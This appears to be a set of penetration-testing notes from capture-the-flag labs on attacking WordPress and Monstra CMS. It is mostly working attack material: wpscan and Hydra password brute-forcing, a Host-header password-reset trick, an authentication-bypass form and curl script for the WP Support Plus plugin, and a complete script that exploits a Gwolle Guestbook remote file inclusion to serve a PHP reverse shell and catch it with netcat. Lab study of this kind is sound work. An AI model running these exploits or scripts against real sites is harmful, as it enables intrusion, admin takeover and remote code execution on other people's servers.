Wordpress
Investigate
https://$IP/webservices/wp
https://$IP/webservices/wp/wp-login.php
/wordpress/ ....WordPress is fertile ground: an admin login usually turns into a shell (theme/plugin editor, plugin upload). User access = shell.
/phpmyadmin/ ....suggests there is a database ready to plunder.
/info.php .....gives us Kernel, hostname and OS information immediately.
wpscan
Wordpress Vuln Scanner
> wpscan --url $IP
> wpscan --url https://$IP --disable-tls-checks
Enum plugins
> wpscan --url http://$IP/webservices/wp/ --enumerate p
> wpscan --url http://$IP/webservices/wp -e ap --log wpscan.out ..ap = all plugins (p = popular only, vp = known-vulnerable only)
Enum plugins/themes/users
> wpscan --url http://$IP/webservices/wp -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive --api-token GetYourOwnAPIKey 2>&1
Brute with known user: 'elliot' (dedupe the wordlist first; the raw fsocity.dic is mostly repeated entries)
> wpscan --url 192.168.50.102 -U elliot --passwords ./fsocity_uniq.dic
-----------------------
-----------------------
Monstra
https://$IP/webservices/monstra-3.0.4/
https://$IP/webservices/monstra-3.0.4/admin/
admin:admin ..default works!
Try to edit themes!
Theme templates are PHP, so a writable theme = code execution
Monstra > Extends > Themes
"Helloworld" > Save ..fails
System > Backup ..not created (not writeable)
Content > Files ..new directory (created)
Content > Files > File ..Fails
System > Settings > Maintenance Mode
<?php phpinfo(); ?> ..Save Fails
Hello ..Save Fails
-----------------------
-----------------------
searchsploit monstra
github monstra > Issues ..search the issue tracker for:
php code execution
sqli or lfi
-----------------------
-----------------------
Wordpress RCE Exploits
wordpress-rce-exploit.sh
wordpress-rce-exploit.py --python version
> sudo python ./wordpress-rce-exploit.py http://$IP/wp-login.php $MyIP:4444 admin
wp curl trick
Requests a password reset for admin with a chosen Host header; the aim is to get hold of the 'enter new password' link
> curl -H "Host: $IP" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password" "http://$IP/wp-login.php?action=lostpassword"
(quote the URL, the '?' is a shell glob character)
wp-support-plus-responsive-ticket-system
> wpscan --url https://$IP --disable-tls-checks
wp-support-plus-responsive-ticket-system
Version: 7.1.3
> searchsploit -x 41006.txt
<form method="post" action="http://wp/wp-admin/admin-ajax.php">
Username: <input type="text" name="username" value="administrator">
<input type="hidden" name="email" value="sth">
<input type="hidden" name="action" value="loginGuestFacebook">
<input type="submit" value="Login">
</form>
Save as hello.html, replace http://wp with the target URL
Serve: python3 -m http.server ..listens on 8000 by default
http://localhost:8000/hello.html ..open it in the browser that has the target open, submit
The response sets a WordPress session cookie for 'administrator'. Reload the target page - Now Admin!!
https://brainfuck.htb/?page_id=6
https://brainfuck.htb/wp-admin/admin-ajax.php
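Same loginGuestFacebook bypass driven from curl instead of the browser form, plus a check that the cookie jar really holds a WordPress login cookie. This is an added example, not part of these notes or of the EDB 41006 exploit; TARGET, the cookie-jar path and the 'administrator' username are assumptions.

```shell
#!/bin/sh
# Added example (not from the original notes or the exploit author):
# POST the same fields the exploit's HTML form sends to admin-ajax.php,
# keep the Set-Cookie response in a jar, then verify the jar contains a
# wordpress_logged_in_ cookie. TARGET/JAR/username are assumptions.

TARGET="${TARGET:-http://$IP}"      # e.g. http://10.10.10.17, set by caller
JAR="${JAR:-wp_admin.cookies}"

# -c writes the response cookies to the jar; -k tolerates self-signed TLS.
bypass_login() {
  user="$1"
  curl -s -k -c "$JAR" \
    -d "username=$user" -d "email=sth" -d "action=loginGuestFacebook" \
    "$TARGET/wp-admin/admin-ajax.php" >/dev/null
}

# WordPress marks a logged-in session with a wordpress_logged_in_<hash>
# cookie whose value starts with "<username>|<expiry>|<hmac>" (the '|' is
# stored URL-encoded as %7C). Prints the username and returns 0 when the
# jar holds such a cookie, returns 1 otherwise.
logged_in_user() {
  jar="$1"
  # Netscape jar columns: domain, subdomains, path, secure, expiry, name, value
  awk '$6 ~ /^wordpress_logged_in_/ {
         gsub(/%7C/, "|", $7); split($7, v, "|"); print v[1]; found = 1
       }
       END { exit !found }' "$jar"
}

if [ -n "$IP" ]; then
  bypass_login administrator
  if u=$(logged_in_user "$JAR"); then
    echo "session for '$u' saved in $JAR; reuse it: curl -b $JAR $TARGET/wp-admin/"
  else
    echo "no wordpress_logged_in_ cookie: plugin version or username may differ"
  fi
fi
```

The cookie check is the CLI equivalent of "reload the page": the bypass request itself returns nothing useful, so the jar is the only evidence it worked.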
Brute Force Username - Hydra (F= must match the target's exact error text; newer WordPress returns 'Unknown username' instead of 'Invalid username', check one failed login by hand first)
> hydra -vV -L users.dic -p wedontcare 192.168.50.102 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'
Gwolle Guestbook RFI
TartarsauceHTB
Check the plugin version (affected: <= 1.5.3)
Basically:
http://$IP...ajaxresponse?abspath=http://$MyIP/
Place an evil 'wp-load.php' (actually a PHP reverse shell) on your local web server: the plugin appends 'wp-load.php' to whatever abspath you give it and includes the result
-------------------------
searchsploit gwolle
searchsploit -x 38861 ..read
Remote File Inclusion (RFI) - Found for 1.5.3
-------------------------
RFI:
http://$IP/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://$MyIP
-------------------------
Prep:
locate php-reverse
cp /usr/share/webshells/php/php-reverse-shell.php wp-load.php
vim wp-load.php ..set $ip and $port to your listener
sudo python -m SimpleHTTPServer 80 ..port 80 needs root
-------------------------
Exploit:
nc -lvnp 7500 ..start the listener first; port must match $port in wp-load.php
curl -s "http://$IP/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://$MyIP/"
(keep the trailing / or else this wont work: the include becomes http://$MyIP/wp-load.php only with it)
connected!
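The whole Gwolle procedure above as one script: patch the pentestmonkey template, serve it, fire the RFI, catch the shell. This is an added example and not part of these notes or of EDB 38861; IP, MYIP and LPORT are assumptions supplied by the caller, the template path and plugin path are the ones the notes use.

```shell
#!/bin/sh
# Added example (not from the original notes or the EDB 38861 author):
# Gwolle Guestbook <= 1.5.3 RFI end to end. The plugin runs
# require_once($_GET['abspath'] . 'wp-load.php'), so the served file must be
# called wp-load.php and abspath must end in '/'. IP/MYIP/LPORT are assumed.

TEMPLATE=/usr/share/webshells/php/php-reverse-shell.php   # pentestmonkey shell
PLUGIN_PATH=wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php

# Replace the template's two "CHANGE THIS" lines ($ip = '127.0.0.1'; and
# $port = 1234;) with our listener and write the result to $4.
make_payload() {
  src="$1"; ip="$2"; port="$3"; out="$4"
  sed -e "s/^\$ip = '127.0.0.1';/\$ip = '$ip';/" \
      -e "s/^\$port = 1234;/\$port = $port;/" "$src" > "$out"
  # refuse to continue if either placeholder survived (wrong template)
  if grep -qE '127\.0\.0\.1|= 1234;' "$out"; then
    echo "template placeholders not found in $src" >&2
    return 1
  fi
}

# Build the exploit URL; appends the '/' the include needs if it is missing.
rfi_url() {
  base="$1"; attacker="$2"
  case "$attacker" in */) ;; *) attacker="$attacker/" ;; esac
  printf '%s/%s?abspath=%s\n' "$base" "$PLUGIN_PATH" "$attacker"
}

exploit() {
  target="$1"; myip="$2"; lport="$3"
  make_payload "$TEMPLATE" "$myip" "$lport" wp-load.php || return 1
  # serve wp-load.php from the current directory on port 80 (needs root)
  python3 -m http.server 80 --bind "$myip" >/dev/null 2>&1 &
  srv=$!
  url=$(rfi_url "$target" "http://$myip")
  # listener must be up before the include fires, so curl runs delayed
  ( sleep 2; curl -s -m 10 "$url" >/dev/null ) &
  nc -lvnp "$lport"
  kill "$srv"
}

if [ -n "$IP" ] && [ -n "$MYIP" ]; then
  exploit "http://$IP/webservices/wp" "$MYIP" "${LPORT:-7500}"
fi
```

Run as root with IP, MYIP and optionally LPORT exported; the script does nothing when they are unset, so the helpers can be sourced and used on their own.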